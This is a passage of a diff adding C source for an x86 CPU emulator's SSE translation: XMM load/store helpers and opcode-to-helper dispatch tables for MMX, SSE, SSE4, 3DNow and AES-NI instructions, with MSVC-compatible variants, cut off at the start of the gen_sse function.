+} + +static inline void gen_stq_env_A0(DisasContext *s, int offset) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); +} + +static inline void gen_ldo_env_A0(DisasContext *s, int offset) +{ + int mem_index = s->mem_index; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, mem_index, MO_LEQ); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(0))); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_A0, 8); + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_tmp0, mem_index, MO_LEQ); + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(1))); +} + +static inline void gen_sto_env_A0(DisasContext *s, int offset) +{ + int mem_index = s->mem_index; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(0))); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, mem_index, MO_LEQ); + tcg_gen_addi_tl(tcg_ctx, cpu_tmp0, cpu_A0, 8); + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, tcg_ctx->cpu_env, offset + offsetof(XMMReg, XMM_Q(1))); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_tmp0, mem_index, MO_LEQ); +} + +static inline void gen_op_movo(TCGContext *s, int d_offset, int s_offset) +{ + TCGv_i64 cpu_tmp1_i64 = s->cpu_tmp1_i64; + + tcg_gen_ld_i64(s, cpu_tmp1_i64, s->cpu_env, s_offset); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset); + tcg_gen_ld_i64(s, cpu_tmp1_i64, s->cpu_env, s_offset + 8); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset + 8); +} + +static inline void gen_op_movq(TCGContext *s, int d_offset, int s_offset) +{ + TCGv_i64 cpu_tmp1_i64 = s->cpu_tmp1_i64; + + tcg_gen_ld_i64(s, cpu_tmp1_i64, s->cpu_env, s_offset); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset); +} + +static inline void gen_op_movl(TCGContext *s, int d_offset, int s_offset) +{ + tcg_gen_ld_i32(s, s->cpu_tmp2_i32, s->cpu_env, s_offset); + tcg_gen_st_i32(s, s->cpu_tmp2_i32, s->cpu_env, d_offset); +} + +static inline void gen_op_movq_env_0(TCGContext *s, int d_offset) +{ + TCGv_i64 cpu_tmp1_i64 = s->cpu_tmp1_i64; + + tcg_gen_movi_i64(s, cpu_tmp1_i64, 0); + tcg_gen_st_i64(s, cpu_tmp1_i64, s->cpu_env, d_offset); +} + +typedef void (*SSEFunc_i_ep)(TCGContext *s, TCGv_i32 val, TCGv_ptr env, TCGv_ptr reg); +typedef void (*SSEFunc_l_ep)(TCGContext *s, TCGv_i64 val, TCGv_ptr env, TCGv_ptr reg); +typedef void (*SSEFunc_0_epi)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i32 val); +typedef void (*SSEFunc_0_epl)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg, TCGv_i64 val); +typedef void (*SSEFunc_0_epp)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b); +typedef void (*SSEFunc_0_eppi)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, + TCGv_i32 val); +typedef void (*SSEFunc_0_ppi)(TCGContext *s, TCGv_ptr reg_a, TCGv_ptr reg_b, TCGv_i32 val); +typedef void (*SSEFunc_0_eppt)(TCGContext *s, TCGv_ptr env, TCGv_ptr reg_a, TCGv_ptr reg_b, + TCGv val); + +#define SSE_SPECIAL ((void *)1) +#define SSE_DUMMY ((void *)2) + +#define MMX_OP2(x) { gen_helper_ ## x ## _mmx, gen_helper_ ## x ## _xmm } +#define SSE_FOP(x) { gen_helper_ ## x ## ps, gen_helper_ ## x ## pd, \ + gen_helper_ ## x ## ss, gen_helper_ ## x ## sd, } + +static const SSEFunc_0_epp sse_op_table1[256][4] = { + // filler: 0x00 - 0x0e + {0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0},{0}, + + /* 3DNow! extensions */ + { SSE_DUMMY }, /* femms */ + { SSE_DUMMY }, /* pf. . . */ + + /* pure SSE operations */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movups, movupd, movss, movsd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd, movsldup, movddup */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movlps, movlpd */ + { gen_helper_punpckldq_xmm, gen_helper_punpcklqdq_xmm }, + { gen_helper_punpckhdq_xmm, gen_helper_punpckhqdq_xmm }, + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd, movshdup */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movhps, movhpd */ + + // filler: 0x18 - 0x27 + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + + /* pure SSE operations */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movaps, movapd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtpi2ps, cvtpi2pd, cvtsi2ss, cvtsi2sd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movntps, movntpd, movntss, movntsd */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvttps2pi, cvttpd2pi, cvttsd2si, cvttss2si */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* cvtps2pi, cvtpd2pi, cvtsd2si, cvtss2si */ + { gen_helper_ucomiss, gen_helper_ucomisd }, + { gen_helper_comiss, gen_helper_comisd }, + + // filler: 0x30 - 0x37 + {0},{0},{0},{0},{0},{0},{0},{0}, + + /* SSSE3, SSE4, MOVBE, CRC32, BMI1, BMI2, ADX. */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, + {0}, // filler: 0x39 + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, + + // filler: 0x3b - 0x4f + {0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + + /* pure SSE operations */ + { SSE_SPECIAL, SSE_SPECIAL }, /* movmskps, movmskpd */ + SSE_FOP(sqrt), + { gen_helper_rsqrtps, NULL, gen_helper_rsqrtss, NULL }, + { gen_helper_rcpps, NULL, gen_helper_rcpss, NULL }, + { gen_helper_pand_xmm, gen_helper_pand_xmm }, /* andps, andpd */ + { gen_helper_pandn_xmm, gen_helper_pandn_xmm }, /* andnps, andnpd */ + { gen_helper_por_xmm, gen_helper_por_xmm }, /* orps, orpd */ + { gen_helper_pxor_xmm, gen_helper_pxor_xmm }, /* xorps, xorpd */ + SSE_FOP(add), + SSE_FOP(mul), + { gen_helper_cvtps2pd, gen_helper_cvtpd2ps, + gen_helper_cvtss2sd, gen_helper_cvtsd2ss }, + { gen_helper_cvtdq2ps, gen_helper_cvtps2dq, gen_helper_cvttps2dq }, + SSE_FOP(sub), + SSE_FOP(min), + SSE_FOP(div), + SSE_FOP(max), + + /* MMX ops and their SSE extensions */ + MMX_OP2(punpcklbw), + MMX_OP2(punpcklwd), + MMX_OP2(punpckldq), + MMX_OP2(packsswb), + MMX_OP2(pcmpgtb), + MMX_OP2(pcmpgtw), + MMX_OP2(pcmpgtl), + MMX_OP2(packuswb), + MMX_OP2(punpckhbw), + MMX_OP2(punpckhwd), + MMX_OP2(punpckhdq), + MMX_OP2(packssdw), + { NULL, gen_helper_punpcklqdq_xmm }, + { NULL, gen_helper_punpckhqdq_xmm }, + { SSE_SPECIAL, SSE_SPECIAL }, /* movd mm, ea */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, , movqdu */ + { (SSEFunc_0_epp)gen_helper_pshufw_mmx, + (SSEFunc_0_epp)gen_helper_pshufd_xmm, + (SSEFunc_0_epp)gen_helper_pshufhw_xmm, + (SSEFunc_0_epp)gen_helper_pshuflw_xmm }, /* XXX: casts */ + { SSE_SPECIAL, SSE_SPECIAL }, /* shiftw */ + { SSE_SPECIAL, SSE_SPECIAL }, /* shiftd */ + { SSE_SPECIAL, SSE_SPECIAL }, /* shiftq */ + MMX_OP2(pcmpeqb), + MMX_OP2(pcmpeqw), + MMX_OP2(pcmpeql), + { SSE_DUMMY }, /* emms */ + { NULL, SSE_SPECIAL, NULL, SSE_SPECIAL }, /* extrq_i, insertq_i */ + { NULL, gen_helper_extrq_r, NULL, gen_helper_insertq_r }, + {0},{0}, // filler: 0x7a - 0x7b + { NULL, gen_helper_haddpd, NULL, gen_helper_haddps }, + { NULL, gen_helper_hsubpd, NULL, gen_helper_hsubps }, + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movd, movd, , movq */ + { SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, /* movq, movdqa, movdqu */ + + // filler: 0x80 - 0xc1 + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0}, + + SSE_FOP(cmpeq), + + // filler: 0xc3 + {0}, + + /* MMX ops and their SSE extensions */ + { SSE_SPECIAL, SSE_SPECIAL }, /* pinsrw */ + { SSE_SPECIAL, SSE_SPECIAL }, /* pextrw */ + + { (SSEFunc_0_epp)gen_helper_shufps, + (SSEFunc_0_epp)gen_helper_shufpd }, /* XXX: casts */ + + // filler: 0xc7 - 0xcf + {0}, {0},{0},{0},{0},{0},{0},{0},{0}, + + /* MMX ops and their SSE extensions */ + { NULL, gen_helper_addsubpd, NULL, gen_helper_addsubps }, + MMX_OP2(psrlw), + MMX_OP2(psrld), + MMX_OP2(psrlq), + MMX_OP2(paddq), + MMX_OP2(pmullw), + { NULL, SSE_SPECIAL, SSE_SPECIAL, SSE_SPECIAL }, + { SSE_SPECIAL, SSE_SPECIAL }, /* pmovmskb */ + MMX_OP2(psubusb), + MMX_OP2(psubusw), + MMX_OP2(pminub), + MMX_OP2(pand), + MMX_OP2(paddusb), + MMX_OP2(paddusw), + MMX_OP2(pmaxub), + MMX_OP2(pandn), + MMX_OP2(pavgb), + MMX_OP2(psraw), + MMX_OP2(psrad), + MMX_OP2(pavgw), + MMX_OP2(pmulhuw), + MMX_OP2(pmulhw), + { NULL, gen_helper_cvttpd2dq, gen_helper_cvtdq2pd, gen_helper_cvtpd2dq }, + { SSE_SPECIAL , SSE_SPECIAL }, /* movntq, movntq */ + MMX_OP2(psubsb), + MMX_OP2(psubsw), + MMX_OP2(pminsw), + MMX_OP2(por), + MMX_OP2(paddsb), + MMX_OP2(paddsw), + MMX_OP2(pmaxsw), + MMX_OP2(pxor), + { NULL, NULL, NULL, SSE_SPECIAL }, /* lddqu */ + MMX_OP2(psllw), + MMX_OP2(pslld), + MMX_OP2(psllq), + MMX_OP2(pmuludq), + MMX_OP2(pmaddwd), + MMX_OP2(psadbw), + { (SSEFunc_0_epp)gen_helper_maskmov_mmx, + (SSEFunc_0_epp)gen_helper_maskmov_xmm }, /* XXX: casts */ + MMX_OP2(psubb), + MMX_OP2(psubw), + MMX_OP2(psubl), + MMX_OP2(psubq), + MMX_OP2(paddb), + MMX_OP2(paddw), + MMX_OP2(paddl), + + // filler: 0xff + {0}, +}; + +static const SSEFunc_0_epp sse_op_table2[3 * 8][2] = { +#ifdef _MSC_VER + {0},{0}, + MMX_OP2(psrlw), + {0}, + MMX_OP2(psraw), + {0}, + MMX_OP2(psllw), + {0},{0},{0}, + MMX_OP2(psrld), + {0}, + MMX_OP2(psrad), + {0}, + MMX_OP2(pslld), + {0},{0},{0}, + MMX_OP2(psrlq), + { NULL, gen_helper_psrldq_xmm }, + {0},{0}, + MMX_OP2(psllq), + { NULL, gen_helper_pslldq_xmm }, +#else + [0 + 2] = MMX_OP2(psrlw), + [0 + 4] = MMX_OP2(psraw), + [0 + 6] = MMX_OP2(psllw), + [8 + 2] = MMX_OP2(psrld), + [8 + 4] = MMX_OP2(psrad), + [8 + 6] = MMX_OP2(pslld), + [16 + 2] = MMX_OP2(psrlq), + [16 + 3] = { NULL, gen_helper_psrldq_xmm }, + [16 + 6] = MMX_OP2(psllq), + [16 + 7] = { NULL, gen_helper_pslldq_xmm }, +#endif +}; + +static const SSEFunc_0_epi sse_op_table3ai[] = { + gen_helper_cvtsi2ss, + gen_helper_cvtsi2sd +}; + +#ifdef TARGET_X86_64 +static const SSEFunc_0_epl sse_op_table3aq[] = { + gen_helper_cvtsq2ss, + gen_helper_cvtsq2sd +}; +#endif + +static const SSEFunc_i_ep sse_op_table3bi[] = { + gen_helper_cvttss2si, + gen_helper_cvtss2si, + gen_helper_cvttsd2si, + gen_helper_cvtsd2si +}; + +#ifdef TARGET_X86_64 +static const SSEFunc_l_ep sse_op_table3bq[] = { + gen_helper_cvttss2sq, + gen_helper_cvtss2sq, + gen_helper_cvttsd2sq, + gen_helper_cvtsd2sq +}; +#endif + +static const SSEFunc_0_epp sse_op_table4[8][4] = { + SSE_FOP(cmpeq), + SSE_FOP(cmplt), + SSE_FOP(cmple), + SSE_FOP(cmpunord), + SSE_FOP(cmpneq), + SSE_FOP(cmpnlt), + SSE_FOP(cmpnle), + SSE_FOP(cmpord), +}; + +static const SSEFunc_0_epp sse_op_table5[256] = { +#ifdef _MSC_VER + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0}, // filler: 0x00 - 0x0b + gen_helper_pi2fw, + gen_helper_pi2fd, + {0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0}, // filler: 0x0e - 0x01b + gen_helper_pf2iw, + gen_helper_pf2id, + // filler: 0x1e - 0x89 + {0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0}, + gen_helper_pfnacc, + {0},{0},{0}, // filler: 0x8b - 0x8d + gen_helper_pfpnacc, + {0}, // filler: 0x8f + gen_helper_pfcmpge, + {0},{0},{0}, // filler: 0x91 - 0x93 + gen_helper_pfmin, + {0}, // filler: 0x95 + gen_helper_pfrcp, + gen_helper_pfrsqrt, + {0},{0}, // filler: 0x98 - 0x99 + gen_helper_pfsub, + {0},{0},{0}, // filler: 0x9b - 0x9d + gen_helper_pfadd, + {0}, // filler: 0x9f + gen_helper_pfcmpgt, + {0},{0},{0}, // filler: 0xa1 - 0xa3 + gen_helper_pfmax, + {0}, // filler: 0xa5 + gen_helper_movq, /* pfrcpit1; no need to actually increase precision */ + gen_helper_movq, /* pfrsqit1 */ + {0},{0}, // filler: 0xa8 - 0xa9 + gen_helper_pfsubr, + {0},{0},{0}, // filler: 0xab - 0xad + gen_helper_pfacc, + {0}, // filler: 0xaf + gen_helper_pfcmpeq, + {0},{0},{0}, // filler: 0xb1 - 0xb3 + gen_helper_pfmul, + {0}, // filler: 0xb5 + gen_helper_movq, /* pfrcpit2 */ + gen_helper_pmulhrw_mmx, + {0},{0},{0}, // filler: 0xb8 - 0xba + gen_helper_pswapd, + {0},{0},{0}, // filler: 0xbc - 0xbe + gen_helper_pavgb_mmx, /* pavgusb */ + // filler: 0xc0 - 0xff + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, + {0},{0},{0},{0},{0},{0},{0},{0}, {0},{0},{0},{0},{0},{0},{0},{0}, +#else + [0x0c] = gen_helper_pi2fw, + [0x0d] = gen_helper_pi2fd, + [0x1c] = gen_helper_pf2iw, + [0x1d] = gen_helper_pf2id, + [0x8a] = gen_helper_pfnacc, + [0x8e] = gen_helper_pfpnacc, + [0x90] = gen_helper_pfcmpge, + [0x94] = gen_helper_pfmin, + [0x96] = gen_helper_pfrcp, + [0x97] = gen_helper_pfrsqrt, + [0x9a] = gen_helper_pfsub, + [0x9e] = gen_helper_pfadd, + [0xa0] = gen_helper_pfcmpgt, + [0xa4] = gen_helper_pfmax, + [0xa6] = gen_helper_movq, /* pfrcpit1; no need to actually increase precision */ + [0xa7] = gen_helper_movq, /* pfrsqit1 */ + [0xaa] = gen_helper_pfsubr, + [0xae] = gen_helper_pfacc, + [0xb0] = gen_helper_pfcmpeq, + [0xb4] = gen_helper_pfmul, + [0xb6] = gen_helper_movq, /* pfrcpit2 */ + [0xb7] = gen_helper_pmulhrw_mmx, + [0xbb] = gen_helper_pswapd, + [0xbf] = gen_helper_pavgb_mmx /* pavgusb */ +#endif +}; + +struct SSEOpHelper_epp { + SSEFunc_0_epp op[2]; + uint32_t ext_mask; +}; + +struct SSEOpHelper_eppi { + SSEFunc_0_eppi op[2]; + uint32_t ext_mask; +}; + +#define SSSE3_OP(x) { MMX_OP2(x), CPUID_EXT_SSSE3 } +#define SSE41_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE41 } +#define SSE42_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_SSE42 } +#define SSE41_SPECIAL { { NULL, SSE_SPECIAL }, CPUID_EXT_SSE41 } +#define PCLMULQDQ_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, \ + CPUID_EXT_PCLMULQDQ } +#define AESNI_OP(x) { { NULL, gen_helper_ ## x ## _xmm }, CPUID_EXT_AES } + +static const struct SSEOpHelper_epp sse_op_table6[256] = { + SSSE3_OP(pshufb), + SSSE3_OP(phaddw), + SSSE3_OP(phaddd), + SSSE3_OP(phaddsw), + SSSE3_OP(pmaddubsw), + SSSE3_OP(phsubw), + SSSE3_OP(phsubd), + SSSE3_OP(phsubsw), + SSSE3_OP(psignb), + SSSE3_OP(psignw), + SSSE3_OP(psignd), + SSSE3_OP(pmulhrsw), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x0c - 0x0f + SSE41_OP(pblendvb), + {{0},0},{{0},0},{{0},0}, // filler: 0x11 - 0x13 + SSE41_OP(blendvps), + SSE41_OP(blendvpd), + {{0},0}, // filler: 0x16 + SSE41_OP(ptest), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x18 - 0x1b + SSSE3_OP(pabsb), + SSSE3_OP(pabsw), + SSSE3_OP(pabsd), + {{0},0}, // filler: 0x1f + SSE41_OP(pmovsxbw), + SSE41_OP(pmovsxbd), + SSE41_OP(pmovsxbq), + SSE41_OP(pmovsxwd), + SSE41_OP(pmovsxwq), + SSE41_OP(pmovsxdq), + {{0},0},{{0},0}, // filler: 0x26 - 0x27 + SSE41_OP(pmuldq), + SSE41_OP(pcmpeqq), + SSE41_SPECIAL, /* movntqda */ + SSE41_OP(packusdw), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x2c - 0x2f + SSE41_OP(pmovzxbw), + SSE41_OP(pmovzxbd), + SSE41_OP(pmovzxbq), + SSE41_OP(pmovzxwd), + SSE41_OP(pmovzxwq), + SSE41_OP(pmovzxdq), + {{0},0}, // filler: 0x36 + SSE42_OP(pcmpgtq), + SSE41_OP(pminsb), + SSE41_OP(pminsd), + SSE41_OP(pminuw), + SSE41_OP(pminud), + SSE41_OP(pmaxsb), + SSE41_OP(pmaxsd), + SSE41_OP(pmaxuw), + SSE41_OP(pmaxud), + SSE41_OP(pmulld), + SSE41_OP(phminposuw), + // filler: 0x42 - 0xda + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0}, + AESNI_OP(aesimc), + AESNI_OP(aesenc), + AESNI_OP(aesenclast), + AESNI_OP(aesdec), + AESNI_OP(aesdeclast), + // filler: 0xe0 - 0xff + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, +}; + +static const struct SSEOpHelper_eppi sse_op_table7[256] = { +#ifdef _MSC_VER + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x00 - 0x07 + SSE41_OP(roundps), + SSE41_OP(roundpd), + SSE41_OP(roundss), + SSE41_OP(roundsd), + SSE41_OP(blendps), + SSE41_OP(blendpd), + SSE41_OP(pblendw), + SSSE3_OP(palignr), + {{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x10 - 0x13 + SSE41_SPECIAL, /* pextrb */ + SSE41_SPECIAL, /* pextrw */ + SSE41_SPECIAL, /* pextrd/pextrq */ + SSE41_SPECIAL, /* extractps */ + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, // filler: 0x18 - 0x1f + SSE41_SPECIAL, /* pinsrb */ + SSE41_SPECIAL, /* insertps */ + SSE41_SPECIAL, /* pinsrd/pinsrq */ + // filler: 0x23 - 0x3f + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + SSE41_OP(dpps), + SSE41_OP(dppd), + SSE41_OP(mpsadbw), + {{0},0}, // filler: 0x43 + PCLMULQDQ_OP(pclmulqdq), + // filler: 0x45 - 0x5f + {{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + SSE42_OP(pcmpestrm), + SSE42_OP(pcmpestri), + SSE42_OP(pcmpistrm), + SSE42_OP(pcmpistri), + // filler: 0x64 - 0xde + {{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + AESNI_OP(aeskeygenassist), + // filler: 0xe0 - 0xff + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, + {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, {{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0},{{0},0}, +#else + [0x08] = SSE41_OP(roundps), + [0x09] = SSE41_OP(roundpd), + [0x0a] = SSE41_OP(roundss), + [0x0b] = SSE41_OP(roundsd), + [0x0c] = SSE41_OP(blendps), + [0x0d] = SSE41_OP(blendpd), + [0x0e] = SSE41_OP(pblendw), + [0x0f] = SSSE3_OP(palignr), + [0x14] = SSE41_SPECIAL, /* pextrb */ + [0x15] = SSE41_SPECIAL, /* pextrw */ + [0x16] = SSE41_SPECIAL, /* pextrd/pextrq */ + [0x17] = SSE41_SPECIAL, /* extractps */ + [0x20] = SSE41_SPECIAL, /* pinsrb */ + [0x21] = SSE41_SPECIAL, /* insertps */ + [0x22] = SSE41_SPECIAL, /* pinsrd/pinsrq */ + [0x40] = SSE41_OP(dpps), + [0x41] = SSE41_OP(dppd), + [0x42] = SSE41_OP(mpsadbw), + [0x44] = PCLMULQDQ_OP(pclmulqdq), + [0x60] = SSE42_OP(pcmpestrm), + [0x61] = SSE42_OP(pcmpestri), + [0x62] = SSE42_OP(pcmpistrm), + [0x63] = SSE42_OP(pcmpistri), + [0xdf] = AESNI_OP(aeskeygenassist), +#endif +}; + +static void gen_sse(CPUX86State *env, DisasContext *s, int b, + target_ulong pc_start, int rex_r) +{ + int b1, op1_offset, op2_offset, is_xmm, val; + int modrm, mod, rm, reg; + SSEFunc_0_epp sse_fn_epp; + 